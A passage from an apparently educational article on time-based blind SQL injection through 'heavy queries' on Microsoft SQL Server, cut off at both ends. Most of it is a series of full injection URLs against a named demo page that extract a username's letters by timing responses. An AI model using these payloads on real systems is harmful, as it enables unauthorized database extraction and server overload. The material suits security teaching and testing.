基于时间的大量查询下盲SQL注入技术

procedures and Benchmark functions is cancelled, could we generate a time-based blind SQL injection method?

The answer is yes. Blind SQL injection exploits can only be avoided by using the right programming technique, or, in Michael Howard’s words, “All input is evil until proven otherwise.”

A simple way to generate time delays is to take advantage of one of the biggest database problems, that have made necessary the development of performance-tuning techniques; heavy queries. All you need to generate a time delay is to access a table that has some registers and to build a good query to force the engine to work. In other words, we need to build a query ignoring what the performance best practices recommend.

In this example we have a URL with a SQL Injection vulnerability that can be exploited only by a time-based blind SQL injection. This means that there isn’t any error message produced by the system, and we always obtain the same response (sometimes because a query is right and sometimes because the programmer has coded that value as a default).

Example 1: Microsoft SQL Server. Exploitation with Heavy queries:

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)

As we can see in Figure 2, the query starts at 23:49:11 and ends at 23:49:25 -- 14 seconds. This delay is caused by the third condition in the “where” clause; if it is TRUE, then “300>(select top 1 ascii(substring(name,1,1)) from sysusers)” is TRUE. We actually know that the ASCII value of the first username’s letter in the sysusers table is lower than 300.

As we can see in Figure 3, the query starts at 00:00:28 and ends at 00:00:29 -- one second. This delay is caused by the third condition in the “where” clause; if it is FALSE, then “0>(select top 1 ascii(substring(name,1,1)) from sysusers)” is FALSE. We actually know than the ASCII value of the first username’s letter in the sysusers table is higher than 0.

With these two queries we can access all the information stored in the database measuring the time. The main idea is that when the third condition in the query is FALSE, the database engine stops processing the second condition because with one FALSE value in a query with “and” operators, the result will be FALSE. Therefore, the database engine doesn’t have to process the heavy query (second condition). So, if we want to know the exact value of the username stored, we have to move the index and measure the response time:

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 14 seconds → TRUE

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 0 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 150 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 14 seconds → TRUE

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 75 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 100 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 110 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 120 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 14 seconds → TRUE

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 115 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 118 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 119 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE

Then the result is ASCII(119)=’